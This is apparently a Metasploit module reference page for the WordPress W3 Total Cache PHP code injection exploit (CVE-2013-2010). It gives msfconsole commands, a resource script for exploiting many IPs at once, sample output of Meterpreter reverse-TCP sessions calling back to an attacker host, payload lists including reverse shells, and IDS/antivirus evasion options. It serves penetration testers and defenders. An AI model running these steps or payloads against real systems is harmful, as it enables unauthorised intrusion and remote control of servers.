WordPress W3 Total Cache PHP Code Execution - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/wp_total_cache_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: WordPress W3 Total Cache PHP Code Execution
Module: exploit/unix/webapp/wp_total_cache_exec
Source code: modules/exploits/unix/webapp/wp_total_cache_exec.rb
Disclosure date: 2013-04-17
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2013-2010

This module exploits a PHP Code Injection vulnerability against WordPress plugin W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older is also reported as vulnerable. The vulnerability is due to the handling of certain macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is needed in order to add the malicious comment. If the POSTID option isn't specified, then the module will automatically find or bruteforce one. Also, if anonymous comments aren't allowed, then a valid username and password must be provided. In addition, the "A comment is held for moderation" option on WordPress must be unchecked for successful exploitation. This module has been tested against WordPress 3.5 and W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using wp_total_cache_exec against a single host

Normally, you can use exploit/unix/webapp/wp_total_cache_exec this way:

msf > use exploit/unix/webapp/wp_total_cache_exec
msf exploit(wp_total_cache_exec) > show targets
    ... a list of targets ...
msf exploit(wp_total_cache_exec) > set TARGET target-id
msf exploit(wp_total_cache_exec) > show options
    ... show and set options ...
msf exploit(wp_total_cache_exec) > exploit

Using wp_total_cache_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your wp_total_cache_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/webapp/wp_total_cache_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/wp_total_cache_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/wp_total_cache_exec

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_total_cache_exec) > show info

       Name: WordPress W3 Total Cache PHP Code Execution
     Module: exploit/unix/webapp/wp_total_cache_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2013-04-17

Provided by:
  Unknown
  juan vazquez <[email protected]>
  hdm <[email protected]>
  Christian Mehlmauer <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Wordpress 3.5

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        The password to authenticate with (anonymous if password not provided)
  POSTID                      no        The post ID where publish the comment
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the wordpress application
  USERNAME                    no        The user to authenticate as (anonymous if username not provided)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a PHP Code Injection vulnerability against 
  WordPress plugin W3 Total Cache for versions up to and including 
  0.9.2.8. WP Super Cache 1.2 or older is also reported as vulnerable. 
  The vulnerability is due to the handling of certain macros such as 
  mfunc, which allows arbitrary PHP code injection. A valid post ID is 
  needed in order to add the malicious comment. If the POSTID option 
  isn't specified, then the module will automatically find or 
  bruteforce one. Also, if anonymous comments aren't allowed, then a 
  valid username and password must be provided. In addition, the "A 
  comment is held for moderation" option on WordPress must be 
  unchecked for successful exploitation. This module has been tested 
  against WordPress 3.5 and W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 
  system.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2013-2010
  OSVDB (92652)
  http://www.securityfocus.com/bid/59316
  http://wordpress.org/support/topic/pwn3d
  http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
  https://wpscan.com/vulnerability/6622

Module Options


This is a complete list of options available in the unix/webapp/wp_total_cache_exec exploit:

msf6 exploit(unix/webapp/wp_total_cache_exec) > show options

Module options (exploit/unix/webapp/wp_total_cache_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password to authenticate with (anonymous if password not provided)
   POSTID                      no        The post ID where publish the comment
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    no        The user to authenticate as (anonymous if username not provided)
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wordpress 3.5

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/wp_total_cache_exec exploit:

msf6 exploit(unix/webapp/wp_total_cache_exec) > show advanced

Module advanced options (exploit/unix/webapp/wp_total_cache_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   MAX_POST_ID             1000                                                no        Specify the last post_id used for bruteforce
   MIN_POST_ID             1                                                   no        Specify the first post_id used for bruteforce
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WPCHECK                 true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR            wp-content                                          yes       The name of the wp-content directory
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/wp_total_cache_exec module can exploit:

msf6 exploit(unix/webapp/wp_total_cache_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Wordpress 3.5

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/wp_total_cache_exec exploit:

msf6 exploit(unix/webapp/wp_total_cache_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/wp_total_cache_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/wp_total_cache_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<TARGET_URI> does not seeem to be Wordpress site


Here is a relevant code snippet related to the "<TARGET_URI> does not seeem to be Wordpress site" error message:

102:	    uri
103:	  end
104:	
105:	  def exploit
106:	    unless wordpress_and_online?
107:	      fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
108:	    end
109:	
110:	    @auth = require_auth?
111:	
112:	    if @auth

<PEER> - Login wasn't successful


Here is a relevant code snippet related to the "<PEER> - Login wasn't successful" error message:

111:	
112:	    if @auth
113:	      print_status("Trying to login...")
114:	      @cookie = wordpress_login(@user, @password)
115:	      if @cookie.nil?
116:	        fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
117:	      end
118:	      print_good("Login Successful")
119:	      store_valid_credential(user: @user, private: @password, proof: @cookie)
120:	    else
121:	      print_status("Trying unauthenticated exploitation...")

<PEER> - Unable to post without a valid POST ID where comment


Here is a relevant code snippet related to the "<PEER> - Unable to post without a valid POST ID where comment" error message:

144:	        print_status("Nothing found. Trying to brute force a valid POST ID...")
145:	        min_post_id = datastore['MIN_POST_ID']
146:	        max_post_id = datastore['MAX_POST_ID']
147:	        @post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie)
148:	        if @post_id.nil?
149:	          fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")
150:	        else
151:	          print_status("Using the brute forced POST ID #{@post_id}...")
152:	        end
153:	      end
154:	    end

<PEER> - Expected redirection not returned


Here is a relevant code snippet related to the "<PEER> - Expected redirection not returned" error message:

158:	
159:	    print_status("Injecting the PHP Code in a comment...")
160:	    text = Rex::Text::rand_text_alpha(10)
161:	    post_uri = post_comment(text)
162:	    if post_uri.nil?
163:	      fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned")
164:	    end
165:	
166:	    print_status("Executing the payload...")
167:	    options = {
168:	        'method' => 'GET',

<PEER> - Unexpected redirection, maybe comments are moderated


Here is a relevant code snippet related to the "<PEER> - Unexpected redirection, maybe comments are moderated" error message:

175:	    options.merge!({'cookie' => @cookie}) if @auth
176:	    # Used to see anonymous, moderated comments
177:	    options.merge!({'cookie' => @unauth_cookie}) if @unauth_cookie
178:	    res = send_request_cgi(options)
179:	    if res and res.code == 301
180:	      fail_with(Failure::Unknown, "#{peer} - Unexpected redirection, maybe comments are moderated")
181:	    end
182:	
183:	    if res and !res.body.match(/#{Regexp.escape(text)}/)
184:	      fail_with(Failure::Unknown, "#{peer} - Comment not in post, maybe comments are moderated")
185:	    end

<PEER> - Comment not in post, maybe comments are moderated


Here is a relevant code snippet related to the "<PEER> - Comment not in post, maybe comments are moderated" error message:

179:	    if res and res.code == 301
180:	      fail_with(Failure::Unknown, "#{peer} - Unexpected redirection, maybe comments are moderated")
181:	    end
182:	
183:	    if res and !res.body.match(/#{Regexp.escape(text)}/)
184:	      fail_with(Failure::Unknown, "#{peer} - Comment not in post, maybe comments are moderated")
185:	    end
186:	
187:	  end
188:	
189:	  def check

<PEER> does not seeem to be Wordpress site


Here is a relevant code snippet related to the "<PEER> does not seeem to be Wordpress site" error message:

187:	  end
188:	
189:	  def check
190:	    res = wordpress_and_online?
191:	    unless res
192:	      vprint_error("#{peer} does not seeem to be Wordpress site")
193:	      return Exploit::CheckCode::Unknown
194:	    end
195:	
196:	    if res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /W3 Total Cache\/([0-9\.]*)/
197:	      version = $1

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Unknown
  • juan vazquez
  • hdm
  • Christian Mehlmauer

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.